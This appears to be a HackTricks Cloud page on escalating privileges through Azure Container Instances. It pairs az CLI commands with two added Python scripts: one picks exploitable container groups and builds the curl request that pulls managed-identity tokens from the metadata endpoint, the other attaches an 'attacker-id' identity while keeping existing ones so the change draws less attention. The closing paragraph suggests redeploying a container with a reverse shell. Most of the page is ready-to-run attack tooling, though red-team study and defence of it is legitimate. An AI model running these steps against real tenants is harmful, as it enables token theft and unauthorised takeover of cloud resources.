Az - Azure Container Instances Privesc
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Container Instances
For more information check:
Microsoft.ContainerInstance/containerGroups/read, Microsoft.ContainerInstance/containerGroups/containers/exec/action
These permissions allow the user to execute a command in a running container. This can be used to escalate privileges if the container group has any managed identity attached: from inside the container, the identity's tokens can be requested from the IMDS endpoint (169.254.169.254) without any credentials. Of course, it is also possible to access the source code and any other sensitive information stored inside the container (environment variables, mounted secrets, config files).
To execute `ls` and get the output is as simple as:
```bash
az container exec --name <container-name> --resource-group <res-group> --exec-command 'ls'
```
If the container group runs more than one container, add `--container-name <container>` to pick the one to exec into.
It's also possible to read the output of the container with:
```bash
az container attach --name <container-name> --resource-group <res-group>
```
Or get the logs with:
```bash
az container logs --name <container-name> --resource-group <res-group>
```
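The following is an added example (not HackTricks' own code) that triages the JSON printed by `az container list -o json` to decide which container groups are worth exec-ing into: only groups with a managed identity attached offer something to escalate to, and multi-container groups need `--container-name`. It also builds the IMDS token request to run once inside. The sample JSON is constructed and trimmed to the fields the script reads; the subscription, resource group and identity names in it are made up.

```python
"""Triage `az container list -o json` output for exec/action abuse.

Added example, not HackTricks' own code. The sample JSON below is constructed
(fake subscription, resource group, identity and container names).
"""
import json

# Constructed sample: one group with a user-assigned identity and two
# containers, one group with no identity at all.
SAMPLE_AZ_CONTAINER_LIST = json.dumps([
    {
        "name": "api-prod",
        "resourceGroup": "rg-app",
        "identity": {
            "type": "UserAssigned",
            "userAssignedIdentities": {
                "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-app"
                "/providers/Microsoft.ManagedIdentity/userAssignedIdentities/api-identity": {
                    "clientId": "11111111-1111-1111-1111-111111111111",
                    "principalId": "22222222-2222-2222-2222-222222222222",
                }
            },
        },
        "containers": [{"name": "api"}, {"name": "sidecar"}],
    },
    {
        "name": "static-site",
        "resourceGroup": "rg-app",
        "identity": None,
        "containers": [{"name": "nginx"}],
    },
])

IMDS = "http://169.254.169.254/metadata/identity/oauth2/token"


def attached_identities(group):
    """Identities on a container group: 'SystemAssigned' and/or the resource
    IDs of user-assigned identities (the keys of userAssignedIdentities)."""
    ident = group.get("identity") or {}
    kinds = []
    if "SystemAssigned" in (ident.get("type") or ""):
        kinds.append("SystemAssigned")
    kinds.extend((ident.get("userAssignedIdentities") or {}).keys())
    return kinds


def triage(az_list_json):
    """Map each container group that has an identity to the exact
    `az container exec` commands to run; groups without one are skipped."""
    plan = {}
    for group in json.loads(az_list_json):
        idents = attached_identities(group)
        if not idents:
            continue
        name, rg = group["name"], group["resourceGroup"]
        containers = [c["name"] for c in group["containers"]]
        cmds = []
        for c in containers:
            # exec needs --container-name when the group has several containers
            cname = f" --container-name {c}" if len(containers) > 1 else ""
            cmds.append(f"az container exec --name {name} --resource-group {rg}"
                        f"{cname} --exec-command /bin/sh")
        plan[f"{rg}/{name}"] = {"identities": idents, "exec": cmds}
    return plan


def imds_token_request(resource="https://management.azure.com/", client_id=None):
    """curl to run *inside* the container: IMDS hands out a token for the
    attached identity. client_id selects one user-assigned identity when
    several are attached."""
    url = f"{IMDS}?api-version=2018-02-01&resource={resource}"
    if client_id:
        url += f"&client_id={client_id}"
    return f"curl -s -H Metadata:true '{url}'"


if __name__ == "__main__":
    for target, info in triage(SAMPLE_AZ_CONTAINER_LIST).items():
        print(target, info["identities"])
        for cmd in info["exec"]:
            print("  ", cmd)
    print("then inside the container:", imds_token_request())
```

Run it against real output with `az container list -o json > groups.json` and feed the file to `triage`; the token returned by the IMDS call is usable with `az login --service-principal` style tooling or directly as a bearer token against the ARM API.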
Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
These permissions allow attaching a user-assigned managed identity to a container group. This is very useful to escalate privileges: once the identity is attached, anyone who can execute commands in the container can request its tokens from IMDS.
To attach a user-assigned managed identity to a container group:
```bash
az rest \
--method PATCH \
--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \
--body '{
"identity": {
"type": "UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-managed-identity-name>": {}
}
}
}' \
--headers "Content-Type=application/json"
```
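The body above sets `identity.type` to `UserAssigned`, which on a container group that already has a system-assigned identity (or other user-assigned ones) replaces the whole identity block and silently drops them, a change that can break the workload and draws attention. The added example below (not HackTricks' code) builds the PATCH body from the group's current `identity` block, as returned by `az container show`, so that existing identities are kept and the ARM `identity.type` value is recomputed. The identity resource IDs and subscription in the sample are constructed.

```python
"""Build a container-group identity PATCH body that adds a user-assigned
identity without removing the ones already attached.

Added example, not HackTricks' own code. Resource IDs below are constructed.
"""
import json

# Constructed: what `az container show --query identity` might return for a
# group that already has a system-assigned and one user-assigned identity.
CURRENT_IDENTITY = {
    "type": "SystemAssigned, UserAssigned",
    "principalId": "33333333-3333-3333-3333-333333333333",
    "userAssignedIdentities": {
        "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-app"
        "/providers/Microsoft.ManagedIdentity/userAssignedIdentities/existing-id": {
            "clientId": "44444444-4444-4444-4444-444444444444",
            "principalId": "55555555-5555-5555-5555-555555555555",
        }
    },
}

NEW_UAMI = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-app"
            "/providers/Microsoft.ManagedIdentity/userAssignedIdentities/attacker-id")


def identity_patch_body(current_identity, new_uami_id):
    """Return the PATCH body that adds new_uami_id to the group's identity.

    ARM treats identity.type as authoritative: 'UserAssigned' alone removes a
    system-assigned identity, so the type is derived from what is present.
    Each user-assigned identity is sent as a key with an empty object value;
    the clientId/principalId fields from `show` output are read-only.
    """
    current = current_identity or {}
    has_system = "SystemAssigned" in (current.get("type") or "")
    uamis = {rid: {} for rid in (current.get("userAssignedIdentities") or {})}
    uamis[new_uami_id] = {}
    identity_type = "SystemAssigned, UserAssigned" if has_system else "UserAssigned"
    return {"identity": {"type": identity_type, "userAssignedIdentities": uamis}}


def az_rest_command(subscription, rg, group, body, api_version="2021-09-01"):
    """Render the `az rest` invocation for the body (single-line JSON)."""
    url = (f"/subscriptions/{subscription}/resourceGroups/{rg}/providers/"
           f"Microsoft.ContainerInstance/containerGroups/{group}?api-version={api_version}")
    return (f"az rest --method PATCH --url \"{url}\" "
            f"--body '{json.dumps(body)}' --headers \"Content-Type=application/json\"")


if __name__ == "__main__":
    body = identity_patch_body(CURRENT_IDENTITY, NEW_UAMI)
    print(az_rest_command("00000000-0000-0000-0000-000000000000", "rg-app", "api-prod", body))
```

Fetch the current block with `az container show --name <container-name> --resource-group <res-group> --query identity -o json` and pass it as `current_identity`; with no identity present (`null`) the function produces exactly the body shown on this page.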
Microsoft.Resources/subscriptions/resourcegroups/read, Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
These permissions allow creating or updating a container group with a user-assigned managed identity attached to it. This is very useful to escalate privileges, since the identity's tokens can then be obtained from inside the container.
```bash
az container create \
--resource-group <res-group> \
--name nginx2 \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-managed-identity-name>" \
--restart-policy OnFailure \
--os-type Linux \
--cpu 1 \
--memory 1.0
```
Moreover, it's also possible to update an existing container group by redeploying it with the same name, adding for example the `--command-line` argument with a reverse shell, so that the container runs the attacker's command (with the attached identity available through IMDS) without needing exec permissions. Note that redeploying restarts the containers in the group.